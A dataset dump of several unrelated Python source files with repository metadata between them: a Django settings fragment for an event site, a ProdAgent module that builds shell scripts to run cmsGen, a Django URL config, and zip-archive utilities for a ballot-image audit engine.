# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Asia/Kolkata'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-in'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(ROOT_DIR, 'static')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/static/admin-media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '*uhik@ffpc96vlg*k%*@==o_w+lc+4eijhpu^t+x%fdp!d*vxi'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
'django_authopenid.context_processors.authopenid',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.doc.XViewMiddleware',
'django_authopenid.middleware.OpenIDMiddleware',
'django.middleware.transaction.TransactionMiddleware',
)
ROOT_URLCONF = 'cseismic2kx.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(ROOT_DIR, 'templates'),
)
ACCOUNT_ACTIVATION_DAYS = 10
LOGIN_URL = '/account/signin'
LOGOUT_URL = '/account/signout'
LOGIN_REDIRECT_URL = '/'
REGISTRATION_OPEN = True
AUTH_PROFILE_MODULE = 'participantsprofile.profile'
DEFAULT_FROM_EMAIL = 'no-reply@cseismic2k10.co.cc'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'south',
'django_authopenid',
'cseismic2kx.home',
'cseismic2kx.events',
'cseismic2kx.host',
'cseismic2kx.registration',
'cseismic2kx.participantsprofile',
)
|
[
"jkk.2k9@gmail.com"
] |
jkk.2k9@gmail.com
|
fe7e2469a76a7e7541dcb964b1b39b4f9ba6474f
|
dcd83aeb799143b58956612fb0bfc0258d30f229
|
/src/python/JobCreator/CmsGenTools.py
|
cee0312e494dc987fc6db4ede97f9c48a2de7566
|
[] |
no_license
|
giffels/PRODAGENT
|
67e3e841cfca7421caa505d03417b663a62d321b
|
c99608e3e349397fdd1b0b5c011bf4f33a1c3aad
|
refs/heads/master
| 2021-01-01T05:51:52.200716
| 2012-10-24T13:22:34
| 2012-10-24T13:22:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,571
|
py
|
#!/usr/bin/env python
"""
_CmsGenTools_
Tools for installing/manipulating a CmsGen type workflow node within
a workflow
"""
import inspect
import os
from JobCreator.AppTools import _StandardPreamble, _StandardAbortCheck
from JobCreator.AppTools import _StandardExitCodeCheck
import JobCreator.RuntimeTools.RuntimeCmsGen as RuntimeCmsGen
from ShREEK.ControlPoints.CondImpl.CheckExitCode import CheckExitCode
from ShREEK.ControlPoints.ActionImpl.BasicActions import KillJob
# //
# // Hardcoded at present, until we distribute the tool properly...
#//
CmsGenScriptUrl = "http://cern.ch/ceballos/alpgen/bin/cmsGen.py"
import ProdCommon.CmsGen
class InsertCmsGenStructure:
"""
_InsertCmsGenStructure_
TaskObject operator.
Act on a CmsGen type TaskObject and install some standard structure
for the TaskObject so that commands can be added to it
These fields get commands added to them by the creator plugin
allowing it to be customised if necessary.
Then the contents of the object gets built into an actual script
by the PopulateCmsGenScript operator below
"""
def __init__(self, nodeType = "PayloadNode"):
self.nodeType = nodeType
def __call__(self, taskObject):
"""
_operator()_
Act on a TaskObject, install a standard structure for generating
the main Executable script that calls cmsGen
"""
spec = taskObject[self.nodeType]
if spec.type != "CmsGen":
return
appDetails = spec.application
taskObject['CMSProjectName'] = spec.application['Project']
taskObject['CMSProjectVersion'] = spec.application['Version']
taskObject['CMSExecutable'] = spec.application['Executable']
taskObject['CmsGenConfiguration'] = spec.configuration
# //
# // Add an empty structured file to contain the PSet after
#// it is converted from the Python format.
taskObject.addStructuredFile("CmsGen.cfg")
# //
# // Add structures to enable manipulation of task main script
#// These fields are used to add commands and script calls
# //at intervals in the main script.
# //
#//
taskObject['PreTaskCommands'] = []
taskObject['PostTaskCommands'] = []
taskObject['PreAppCommands'] = []
taskObject['PostAppCommands'] = []
# //
# // Insert End Control Point check on exit status
#//
controlP = taskObject['ShREEKTask'].endControlPoint
exitCheck = CheckExitCode()
exitCheck.attrs['OnFail'] = "killJob"
exitAction = KillJob("killJob")
controlP.addConditional(exitCheck)
controlP.addAction(exitAction)
return
class PopulateCmsGenScript:
"""
_PopulateCmsGenScript_
Act on the TaskObject to convert fields into commands and insert them
into the main script structured file instance.
"""
def __init__(self, nodeType = "PayloadNode"):
self.nodeType = nodeType
def __call__(self, taskObject):
"""
_operator()_
For a TaskObject that has the appropriate App Keys generate
a standard task running script
"""
spec = taskObject[self.nodeType]
if spec.type != "CmsGen":
return
exeScript = taskObject[taskObject['Executable']]
# //
# // Install standard error handling command
#//
exeScript.append(_StandardPreamble)
envScript = taskObject[taskObject["BashEnvironment"]]
envCommand = "%s %s" % (envScript.interpreter, envScript.name)
exeScript.append(envCommand)
srcfile = inspect.getsourcefile(RuntimeCmsGen)
taskObject.attachFile(srcfile)
taskObject['PreTaskCommands'].append("chmod +x ./RuntimeCmsGen.py")
taskObject['PreTaskCommands'].append(
"./RuntimeCmsGen.py"
)
for item in taskObject['PreTaskCommands']:
exeScript.append(item)
# //
# // Pull in the cmsGen tool from the web and
#// make sure it is executable
#exeScript.append("wget %s -O cmsGen" % CmsGenScriptUrl)
# //
# // Install script from ProdCommon.CmsGen
#//
cmsGenScript = inspect.getsourcefile(ProdCommon.CmsGen)
cmsGenScript = cmsGenScript.replace("__init__.py", "cmsGen.py")
taskObject.attachFile(cmsGenScript)
exeScript.append("ln -s ./cmsGen.py cmsGen")
exeScript.append("chmod +x cmsGen")
exeScript.append("( # Start App Subshell")
for item in taskObject['PreAppCommands']:
exeScript.append(item)
# //
# // Need to set command line args at runtime
#// and pass them to the cmsGen command
# //The RuntimeCmsGen.py script will generate a file
# // called cmsGen.args which we cat to extract the content
#//
checkArgs = "if [ -e %s ];then\n" % "cmsGen.args"
checkArgs += " echo \"cmsGen.args is present\"\n"
checkArgs += "else\n"
checkArgs += " echo \"ERROR: cmsGen.args not present\"\n"
checkArgs += " prodAgentFailure 50113\n"
checkArgs += "fi\n"
exeScript.append(checkArgs)
exeScript.append(_StandardAbortCheck)
# //
# // Build Executable command
#//
exeComm = "./%s `cat cmsGen.args` &" % taskObject['CMSExecutable']
exeScript.append(exeComm)
exeScript.append("PROCID=$!")
exeScript.append("echo $PROCID > process_id")
exeScript.append("wait $PROCID")
exeScript.append("EXIT_STATUS=$?")
exeScript.append(_StandardExitCodeCheck)
exeScript.append(
"if [ ! -e exit.status ]; then echo \"$EXIT_STATUS\" > exit.status; fi")
exeScript.append("echo \"App exit status: $EXIT_STATUS\"")
for item in taskObject['PostAppCommands']:
exeScript.append(item)
exeScript.append("exit $EXIT_STATUS")
exeScript.append(") # End of App Subshell")
exeScript.append("EXIT_STATUS=$?")
exeScript.append("echo `date +%s` >| end.time")
for item in taskObject['PostTaskCommands']:
exeScript.append(item)
exeScript.append("echo \"Ended: `date +%s`\"")
exeScript.append("exit $EXIT_STATUS")
return
|
[
""
] | |
efa767f99a362671c9208cd80736bbe672911274
|
ee4df8a9928b684e054b45c0a7c464c38f9a4921
|
/django-rest-react-prototype/django_react/urls.py
|
f23278917e411c5badd2be3510e9d9a047795eb2
|
[] |
no_license
|
cs161sjsu/goldchest
|
7159a704d6bac267cc22e327504dda0a29b48827
|
5c57c373094098191c74a276eeecff4e8e8b706e
|
refs/heads/main
| 2023-03-23T19:19:24.176773
| 2021-03-23T22:48:08
| 2021-03-23T22:48:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 855
|
py
|
"""django_react URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('leads.urls')),
path('', include('frontend.urls')),
path(r'openid/', include('django_openid_auth.urls')),
]
|
[
"jakesrosen@gmail.com"
] |
jakesrosen@gmail.com
|
e85bfbbcd0952f79b26348c90c74ceae73761025
|
4f8a1eaaf546b05323f62200c8f1d1026bbb4dec
|
/utilities/zip_utils.py
|
68189d429e05cbed6952d6aef702bccdba87de56
|
[] |
no_license
|
iero1997/audit-engine-s3-and-lambdas-dev
|
1dc33c19e954952fd394d866facb7b32840e112f
|
c3d2d1669a6509a3581a89c8a047e28801b0b1f7
|
refs/heads/master
| 2022-12-13T09:19:29.487704
| 2020-09-08T14:01:17
| 2020-09-08T14:01:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 28,802
|
py
|
#import io
import os
import re
import sys
import time
import logging
import zipfile
import traceback
from zipfile import ZipFile
from aws_lambda import s3utils
#import time
from utilities import utils, logs
# does anyone know why this TRY is here??
try:
from utilities.config_d import config_dict
from utilities.images_utils import get_images_from_pbm, get_images_from_pdf, get_images_from_png, get_images_from_tif
from models.DB import DB
except ImportError:
get_images_from_pbm = get_images_from_pdf = get_images_from_png = get_images_from_tif = None
PRECINCT_REG = re.compile(r'/(.*?)\.zip$')
BALLOT_FORMAT = {
'.pdf': {
'name_reg': r"(\d+i)\.pdf$",
'get_images': get_images_from_pdf,
},
'.pbm': {
'name_reg': r"(\w+)[FR]\.pbm$",
'get_images': get_images_from_pbm,
},
'.png': {
'name_reg': r"(\w+)\.png$",
'get_images': get_images_from_png,
},
'.tif': {
'name_reg': r"(\w+)\.tif$",
'get_images': get_images_from_tif,
},
'.json': {
'name_reg': r"(\w+)\.json$",
'get_images': None,
},
}
def analyze_ballot_filepath(file_path: str) -> tuple: # returns name, extension, ballotid
""" given file path, return filename, extension, ballotid = analyze_ballot_filepath(file_path)
Note: extension includes '.'
"""
#_, filename = os.path.split(file_path)
filename = utils.safe_path_split(file_path)[1] # archives opened in linux env use both '/' and '\\' separators.
name, extension = os.path.splitext(filename)
# leave only digits and underscores in the ballotid
ballotid = re.sub(r'[^\d_]', '', name)
# sometimes there is an additional extension at th end of the file name.
# this may indicate the sheet number, but the rest of the ballot_id is still unique
ballotid = re.sub(r'^(\d{5}_\d{5}_\d{5,})_\d$', r'\1', ballotid)
return name, extension, ballotid
def get_ballotid(file_path):
return analyze_ballot_filepath(file_path)[2]
def get_ballotid_of_marks_df(file_path):
match = re.search(r'^marks_df_(\d+)\.json$', file_path)
return match[1]
def get_attribute_from_path(argsdict, ballot_image_path, attribute_name):
""" given ballot_image_path from zip archive, extract attribute from path
based on setting of level from argsdict for the attribute.
attribute of -1 means not available.
attribute_names are: 'precinct-folder', 'party-folder', 'group-folder'
returns '' if attribute of -1 is specified.
"""
attribute_str = ''
path_segments = re.split(r'[/\\]', ballot_image_path)
path_segments.pop()
folder_level = int(argsdict.get(attribute_name, 0)) # -1 means the path does not provide this info.
if folder_level >= 0:
if not (folder_level < len(path_segments)):
utils.sts(
f"get_attribute_from_path: {attribute_name} input spec {folder_level} is out of range. Must be less than {len(path_segments)}\n"
f"ballot_image_path provided is {ballot_image_path}")
import pdb; pdb.set_trace()
sys.exit(1)
attribute_str = path_segments[folder_level]
#elif attribute_name == 'precinct-folder':
# utils.exception_report(f"{attribute_name} specified as -1, this attribute cannot be determined from ballot file path. "
# f"Apparently all image files are provided in one big heap. Consider using 'precinct_pattern' input parameter.")
# attribute_str = 'Unspecified Precinct'
return attribute_str
def get_precinct(argsdict, ballot_image_path):
"""
Gets ballot 'precinct' and 'type' (party) based on ballot ballot image file path.
If precinct_pattern is specified, it is used as regex to extract a portion of the filename.
otherwise,
If 'precinct-folder' is specified in the input file and it is not -1, it will be used, if possible.
NOTE: These input parameters precinct-folder and party-folder are temporary. Instead, it will likely
be possible to gather these parameters from the path for a given vendor without needing those
parameters because the 'party' level is either there or not, and can only be a few different
strings. Other vendors have other schemes.
ES&S .pbm files from ES&S have the precinct encoded differently. Can use 'precinct_pattern' in these cases.
use precinct_folder_pattern to extract active portion of the folder level specified.
"""
precinct_str = ''
precinct_pattern = argsdict.get('precinct_pattern')
if precinct_pattern:
filename, _, _ = analyze_ballot_filepath(ballot_image_path)
precinct_str = utils.apply_regex(filename, precinct_pattern, default='')
return precinct_str
precinct_folder_pattern = argsdict.get('precinct_folder_pattern', '')
if precinct_folder_pattern:
precinct_folder_str = get_attribute_from_path(argsdict, ballot_image_path, 'precinct-folder')
precinct_str = utils.apply_regex(precinct_folder_str, precinct_folder_pattern)
return precinct_str
def get_party(argsdict, ballot_image_path):
"""
Gets ballot 'party' based on ballot ballot image file path.
If 'party-folder' is specified in the input file and it is not -1, it will be used, if possible.
otherwise, the path compenents of 1 is used.
string from the path are returned.
TODO: These input parameters precinct-folder and party-folder are temporary. Instead, it will likely
be possible to gather these parameters from the path for a given vendor without needing those
parameters because the 'party' level is either there or not, and can only be a few different
strings. Other vendors have other schemes.
TODO: ES&S .pbm files from ES&S have the precinct encoded differently.
"""
return get_attribute_from_path(argsdict, ballot_image_path, 'party-folder')
def get_group(argsdict, ballot_image_path):
""" The group attribute typically separates VBM and inperson voting.
SF uses the strings 'CGr_Election Day' and 'CGr_Vote by Mail'
"""
return get_attribute_from_path(argsdict, ballot_image_path, 'group-folder')
def open_zip_archive(source, testzip=False):
""" Gets ZIP archive from source file path
Checks for error conditions and raises errors.
"""
if not os.path.exists(source):
raise FileNotFoundError('Source file not found')
# check if passed argument is ZIP file
if not zipfile.is_zipfile(source):
raise ValueError('Source file is not in ZIP format')
# load source archive
archive_obj = ZipFile(source, 'r')
# check if some files are corrupted
if testzip:
corrupted_file = ZipFile.testzip(archive_obj)
if corrupted_file:
print(f"Corrupted files: {corrupted_file}")
return archive_obj
def set_archive_path_local_vs_s3(argsdict, archive_basename):
""" function derives proper full path to archive either on s3 or local
"""
archive_basename = os.path.basename(archive_basename)
folder_path = argsdict['archives_folder_s3path'] if argsdict['use_s3_archives'] else argsdict['archives_folder_path']
fullpath = os.path.join(folder_path, archive_basename)
return fullpath
WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT = {}
def was_archive_generated_on_windows(archive_obj):
try:
archive_basename = os.path.basename(archive_obj.fp.name)
except:
# can't find basename for some reason -- we can't use lookup optimization
return bool(re.search(r'\\', get_file_paths(archive_obj)[0]))
if WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT.get(archive_basename, None) is None:
# we have not evaluated this archive to detemine whether it was generated on windows.
WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT[archive_basename] = bool(re.search('\\', get_file_paths(archive_obj)[0]))
return WAS_ARCHIVE_GENERATED_ON_WINDOWS_DICT[archive_basename]
def open_archive(argsdict, archive_basename, silent_error=False):
""" This is a general entry point for both local archives and s3 based archives.
The source_path can be full path to local or s3 resources, or just basename.
1. check argsdict['use_s3_archives']
2. reduce source_path to just basename
3. prepend either argsdict['archives_folder_path'] or argsdict['archives_folder_s3path']
"""
fullpath = set_archive_path_local_vs_s3(argsdict, archive_basename)
utils.sts(f"Opening source archive: {fullpath}", 3)
if argsdict['use_s3_archives']:
archive_obj = s3_open_archive(s3path=fullpath, silent_error=silent_error)
else:
archive_obj = open_local_archive(source_path=fullpath, silent_error=silent_error)
return archive_obj
def open_local_archive(source_path, testzip=False, silent_error=False):
""" Deals with the error conditions raised in open_zip_archive
Q: why is it a good idea to keep these separate?
It seems that only one archive can be open at a time.
"""
# we've had trouble with spurious "file does not exist" detections when it does.
source_path = os.path.normcase(os.path.normpath(source_path)).strip()
if os.path.isfile(source_path):
utils.sts(f"Verified that {source_path} exists.")
else:
utils.sts(f"Archive {source_path} does not exist according to os.path.exists().")
# this may be a spurious problem related to using a file server.
tot_time = 0
for i in range(1,20):
utils.sts(f"Waiting {i} seconds", 3)
time.sleep(i)
tot_time += i
if os.path.isfile(source_path):
utils.sts(f"After wait of {tot_time} secs, {source_path} now exists according to os.path.exists().", 3)
#import pdb; pdb.set_trace()
break
else:
utils.sts(f"After wait of {tot_time} secs, {source_path} still not found according to os.path.exists().", 3)
import pdb; pdb.set_trace()
sys.exit(1)
try:
archive = open_zip_archive(source_path, testzip)
except (FileNotFoundError, ValueError) as error:
if not silent_error:
logging.error(f"Failed to open archive {source_path} Program failed due to %s", error)
sys.exit(1)
else:
return None
return archive
def s3_open_archive(s3path, silent_error=False):
""" open archive according to s3path
s3://<bucket>/US/WI/WI_Dane_2019_Spring_Pri/2019 Spring Primary Ballot Images.zip
"""
if not s3utils.does_s3path_exist(s3path):
if not silent_error:
utils.sts(f"s3path: {s3path} not found. Cannot open archive.", 3)
sys.exit(1)
return None
try:
s3_IO_obj = s3utils.get_s3path_IO_object(s3path)
archive_obj = ZipFile(s3_IO_obj, 'r')
except (FileNotFoundError, ValueError) as error:
if not silent_error:
logging.error(f"Failed to open archive {s3path} Program failed due to %s", error)
sys.exit(1)
else:
return None
return archive_obj
def get_file_paths(archive_obj) -> list:
"""Gets a list of paths that end with an extension of any kind.
It seems filtering at this stage is a waste of time.
"""
regex = r"\.\w+$"
file_paths = filter(
lambda file: file if re.search(regex, file) else False,
ZipFile.namelist(archive_obj))
return list(file_paths)
def adjust_filepath_separators(archive_obj, path):
""" final path separators must be altered if archive was generated on windows and being read on linux.
This occurs when the list of filepaths internal to the archive are listed on one platform and then
used on the other, when the archive was originally created on Windows.
"""
# this function deals with an inconsistency in zip archives
# with regard to the last filepath separator in file names
# in the archive.
# There are four cases, based on whether the archive is
# produced and then viewed on Windows vs. Linux system.
# Archive generated on:
# |------------------|------------------|
# | Windows | Linux |
# | Actual Shown | Actual Shown |
# Viewed on: |--------+---------|------------------|
# Windows | \ | / | / | / |
# |------------------|------------------|
# Linux | \ | \ | / | / |
# |------------------|------------------|
# strangely, when an archive is generated on windows,
# the last separator is actually \ but it is converted
# by the library so it is /. Thus, if an archive is only
# used on windows or only on linux, this is not a problem.
# However, a zip archive used in linux will regard the
# last separator not as a file separator, but as a
# legitimate filename character, and then join the
# basename with the prior path element as one file name.
# In every case, what is shown is what must be used to
# access a file. Therefore, we will look at the first
# file entry, and if there are any file separators,
# then take the last one, and make that the required
# separator.
# According to zip file specification:
# https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT
# 4.4.17.1 The name of the file, with optional relative path.
# The path stored MUST NOT contain a drive or
# device letter, or a leading slash. All slashes
# MUST be forward slashes '/' as opposed to
# backwards slashes '\' for compatibility with Amiga
# and UNIX file systems etc. If input came from standard
# input, there is no file name field.
if was_archive_generated_on_windows(archive_obj):
if os.sep == '/':
# Linux:
# when trying to access entries using constructed paths, the last element must be changed
# to match the true form of the files as stored in the zip archive.
path = '\\'.join(utils.safe_path_split(path))
else:
# Windows:
# When accessing an entry based on a list of files stored in the archive which was generated
# on linux, then the windows interface requires that the separator be changed to '/'
path = '/'.join(utils.safe_path_split(path))
return path
def get_image_file_paths_from_archive(archive_obj):
"""
Filters 'file_paths' to only containing certain name format
based on file extension.
NOTE: file paths from archives created on windows will use backslash
as the final path separator if read on linux. These are not
altered at this point.
"""
file_paths = get_file_paths(archive_obj)
filtered_paths = []
for file_path in file_paths:
try:
# note that the extension includes '.'
#file_ext = re.search(r'(\.\w+)$', file_path).group(1)
file_ext = os.path.splitext(file_path)[1]
if file_ext == '.db': continue # sometimes "Thumbs.db" are included.
# the following attempts to read the file.
filtered_path = re.search(
BALLOT_FORMAT[file_ext]['name_reg'], file_path)
except (AttributeError, KeyError) as error:
print(f"Couldn't parse the file path:{file_path} error:{error}")
continue
if filtered_path:
filtered_paths.append(file_path)
return filtered_paths
def get_archived_file(archive, file_name=None):
""" Returns dictionary of 'file_name' from archive
NOTE: This may alter the final path separator if running on linux
and archive was originally produced on windows.
"""
try:
result = {'name': file_name, 'bytes_array': archive.read(adjust_filepath_separators(archive, file_name))}
except (OSError, KeyError):
result = None
return result
def get_archived_file_size(archive, file_name) -> int:
""" return the size of the file without extracting it. """
zipinfo = archive.getinfo(adjust_filepath_separators(archive, file_name))
return zipinfo.file_size
def is_archived_file_BMD_type_ess(argsdict, archive, file_name) -> bool:
"""
:param source_name: Name of the source with file. Used for lambdas S3 lookup.
"""
if not argsdict.get('BMDs_exist', False):
return False
expressvote_ballot_threshold = int(argsdict.get('BMD_filesize_threshold', 0))
if not expressvote_ballot_threshold:
expressvote_ballot_threshold = int(config_dict['EXPRESSVOTE_BALLOT_FILESIZE_THRESHOLD'])
""" typically expressvote BMD ballots are smaller than conventional ballots,
about 16K while standard hand-marked paper ballots are larger, at least 34K.
We can check before we remove from the archive. Note, this varies depending on the
complexity of the ballot.
"""
return get_archived_file_size(archive, file_name) < expressvote_ballot_threshold
def get_next_ballot_paths(index, archive, file_paths, extension=None):
"""
given entire list of file_paths and index in archive,
Returns a list of one or two filepaths that relate to a single ballot
Most ballot types(.pdf, .png, .tif) have one file per both sides but
.pbm has two filenames per ballot.
"""
try:
file_path = file_paths[index]
except:
pass
# for most cases, there is only one file per ballot sheet. .pbm has two files per sheet.
return_paths = [file_path]
if extension is None:
_, extension = os.path.splitext(file_path) # note: extension includes '.'
if extension == '.pbm':
index += 1
try:
R_file_path = file_paths[index]
except:
utils.exception_report(f"Warning: could not find rear file of .pbm file {file_path}, insufficient files.")
return index-1, return_paths
if file_path.endswith('F.pbm') and R_file_path.endswith('R.pbm'):
_, _, ballotid = analyze_ballot_filepath(file_path)
_, _, R_ballotid = analyze_ballot_filepath(R_file_path)
if ballotid == R_ballotid:
return_paths.append(R_file_path)
else:
utils.exception_report(f"Warning: could not find rear file of .pbm file {file_path}")
return index-1, return_paths
return index, return_paths
def get_ballot_images(index, archive, file_paths, extension=None):
"""
Returns a list of images from a file, using a method specified
file is indexed in file_paths
in BALLOT_METHOD dictionary under 'extension' key.
"""
file_path = file_paths[index]
if extension is None:
name, extension, ballotid = analyze_ballot_filepath(file_path) # note: extension includes '.'
ballot_file = get_archived_file(archive, file_path)
images = BALLOT_FORMAT[extension]['get_images'](ballot_file)
# Exception for .pbm two sided ballots divided to two files
if extension == '.pbm':
try:
index += 1
r_file_path = file_paths[index]
if file_path.endswith('F.pbm') and r_file_path.endswith('R.pbm'):
r_name, r_extension, r_ballotid = analyze_ballot_filepath(r_file_path)
r_ballot_file = get_archived_file(archive, r_file_path)
images.append(get_ballot_images(r_ballot_file, r_extension))
except IndexError as error:
logging.error("Couldn't find the rear page due to: %s", error)
sys.exit(1)
return index, images
def filter_paths_by_skip(argsdict, file_paths):
"""
Returns a filtered list of file paths. The'skip' parameter can be a number
of elements to skip from the start of the list or a precinct against which
the list should be filtered. Any other precincts after the precinct in
'skip' will be returned also.
"""
def is_int(text):
try:
return isinstance(text, int)
except ValueError:
return False
skip = argsdict.get('skip')
if skip is None or skip == 0 or skip == '0':
return file_paths
if is_int(skip):
skip = int(skip)
list_len = len(file_paths)
diff = skip - list_len
file_paths = file_paths[skip - config_dict['SKIPPED_NUM']:]
if config_dict['SKIPPED_NUM'] < skip:
config_dict['SKIPPED_NUM'] += list_len if diff >= 0 \
else skip - config_dict['SKIPPED_NUM']
if config_dict['SKIPPED_NUM'] > skip:
config_dict['SKIPPED_NUM'] = skip
else:
print("Skip argument is not an integer.\nFiltering file names list...")
i = 0
for file_path in file_paths:
if skip not in file_path:
i += 1
else:
break
file_paths = file_paths[i:]
print(f"Filtered {len(file_paths)} file(s) from the list.")
return file_paths
def filter_paths_by_precinct(argsdict, file_paths):
"""
Return filtered list of file paths.
'precincts' parameter should be a list of precincts to which
list should be filtered.
"""
precincts = argsdict.get('precinct')
if precincts is None or precincts == []:
return file_paths
if not isinstance(precincts, list):
precincts = [precincts]
utils.sts("Filtering file names list by specified precincts...", 3)
selected_file_paths = []
for file_path in file_paths:
precinct_of_file = get_precinct(argsdict, file_path)
if precinct_of_file in precincts:
selected_file_paths.append(file_path)
utils.sts(f"Selected {len(selected_file_paths)} file(s) from the list.", 3)
return selected_file_paths
def null_function(parameter):
return parameter
def filter_ballotids(argsdict, proposed_ballot_id_list, silent=False):
"""
Return filtered list of ballotids.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
"""
return filter_proposed_list_by_ballotid(argsdict, proposed_ballot_id_list, null_function, silent)
def filter_paths_by_ballotid(argsdict, file_paths, silent=False):
"""
Return filtered list of file paths.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
"""
return filter_proposed_list_by_ballotid(argsdict, file_paths, get_ballotid, silent)
def filter_mark_df_paths_by_ballotid(argsdict, file_paths, silent=False):
"""
Return filtered list of file paths.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
"""
return filter_proposed_list_by_ballotid(argsdict, file_paths, get_ballotid_of_marks_df, silent)
def filter_proposed_list_by_ballotid(argsdict, proposed_list, get_ballot_id_function, silent):
"""
Return filtered list of proposed_list.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
get_ballot_id_function - this function is used to extract the ballot_id from one entry in the proposed_list
"""
include_ballotids = argsdict.get('ballotid', [])
if not isinstance(include_ballotids, list):
include_ballotids = [include_ballotids]
exclude_ballotids = argsdict.get('exclude_ballotid', [])
if not isinstance(exclude_ballotids, list):
exclude_ballotids = [exclude_ballotids]
if (not include_ballotids or not len(include_ballotids)) and \
(not exclude_ballotids or not len(exclude_ballotids)):
return proposed_list
utils.sts("Filtering list by specified ballotids...", 3)
selected_items = []
for item in proposed_list:
ballotid_of_item = int(get_ballot_id_function(item))
if include_ballotids:
# include_ballotids specification overrides exclusion.
if ballotid_of_item in include_ballotids:
selected_items.append(item)
elif exclude_ballotids:
if not ballotid_of_item in exclude_ballotids:
selected_items.append(item)
else:
selected_items = proposed_list
break
utils.sts(f"Selected {len(selected_items)} item(s) from the list.", 3)
return selected_items
def filter_paths_by_limit(argsdict, file_paths):
"""
Return filtered list of file paths.
'precincts' parameter should be a list of precincts to which
list should be filtered.
"""
config_dict['LIMITED_NUM'] = 0
files_limit = argsdict.get('limit')
if files_limit is not None and files_limit >= config_dict['LIMITED_NUM']:
list_len = len(file_paths)
diff = files_limit - list_len
file_paths = file_paths[:(files_limit - config_dict['LIMITED_NUM'])]
if config_dict['LIMITED_NUM'] < files_limit:
config_dict['LIMITED_NUM'] += list_len if diff >= 0 else files_limit - config_dict['LIMITED_NUM']
if config_dict['LIMITED_NUM'] > files_limit:
config_dict['LIMITED_NUM'] = files_limit
return file_paths
def filter_image_file_paths(argsdict, file_paths):
"""
argsdict: arguments as provided from CLI and input file.
file_paths: file paths from archive already filtered to image files.
filters list based on precinct, skip, and limit
returns file_paths
"""
file_paths = filter_paths_by_precinct(argsdict, file_paths)
file_paths = filter_paths_by_ballotid(argsdict, file_paths)
file_paths = filter_paths_by_skip(argsdict, file_paths)
file_paths = filter_paths_by_limit(argsdict, file_paths)
return file_paths
file_paths_cache = {}
archives = []
def copy_ballot_pdfs_to_report_folder(argsdict, ballot_id_list, dirname):
utils.sts(f"Copying {len(ballot_id_list)} ballot image files classified as {dirname}", 3)
if not len(ballot_id_list): return
target_folder = DB.dirpath_from_dirname(dirname)
mutated_ballot_id_list = ballot_id_list.copy()
# first create the list of all the archive paths in this archive that are in ballot_id_list
# and open the archives and leave them open during processing.
if not file_paths_cache:
for archive_idx, archive_path in enumerate(argsdict['source']):
archive = open_archive(argsdict, archive_path)
archives.append(archive)
file_paths_list = get_image_file_paths_from_archive(archive)
file_paths_cache[archive_idx] = file_paths_list
while mutated_ballot_id_list:
ballot_id = mutated_ballot_id_list.pop(0)
target_filename = f"{ballot_id}i.pdf"
for archive_idx in range(len(archives)):
ballot_paths = [x for x in file_paths_cache[archive_idx] if re.search(r'[\\/]' + target_filename, x)]
if len(ballot_paths):
utils.sts(f"Extracting {ballot_paths[0]} from archive {archive_idx}", 3)
archives[archive_idx].extract(ballot_paths[0], path=target_folder)
break
else:
mbidl = ', '.join(mutated_ballot_id_list)
utils.sts(f"Logic error: Failed to find some ballot_ids in ballot archives: {mbidl}", 0)
traceback.print_stack()
sys.exit(1)
def copy_ballot_pdfs_from_archive_to_report_folder(archive, filepaths, ballot_id, dirname):
target_filename = f"{ballot_id}i.pdf"
target_folder = DB.dirpath_from_dirname(dirname)
ballot_paths = [x for x in filepaths if re.search(r'[\\/]' + target_filename, x)]
if len(ballot_paths):
utils.sts(f"Extracting {ballot_paths[0]} from archive", 3)
archive.extract(ballot_paths[0], path=target_folder)
